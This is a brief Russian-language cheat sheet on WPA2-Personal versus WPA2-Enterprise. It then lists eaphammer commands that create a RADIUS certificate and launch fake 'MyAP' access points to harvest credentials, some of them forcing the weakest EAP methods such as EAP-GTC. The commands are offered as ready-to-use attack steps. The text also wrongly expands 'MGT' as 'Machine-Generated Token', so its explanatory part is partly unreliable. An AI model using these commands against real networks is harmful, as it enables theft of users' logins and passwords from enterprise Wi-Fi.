В WPA2-Personal (Wi-Fi Protected Access 2 - Personal) используется единый всех клиентов данной беспроводной сети PSK (Pre-Shared Key) — статический ключ (пароль, кодовое слово) минимальной длиной 8 символов, который задается в настройках точки доступа, и шифрование AES (Advanced Encryption Standard).
В WPA2-Enterprise MGT (Machine-Generated Token) вместо PSK используется аутентификация по протоколу 802.1X на сервере RADIUS (Remote Authentication Dial-In User Service), при этом у каждого пользователя свои логин и пароль, что снижает риск компрометации учётных данных.
Создать сертификат RADIUS для точки доступа (необходим для любой атаки, затрагивающей EAP)
eaphammer --cert-wizard
Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP"
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --creds
Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP", предложить сначала самые слабые методы EAP
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --negotiate weakest --creds
Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP", предложить сначала EAP-GTC, затем перейти к более надёжным методам для ускорения согласования EAP
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --negotiate balanced --creds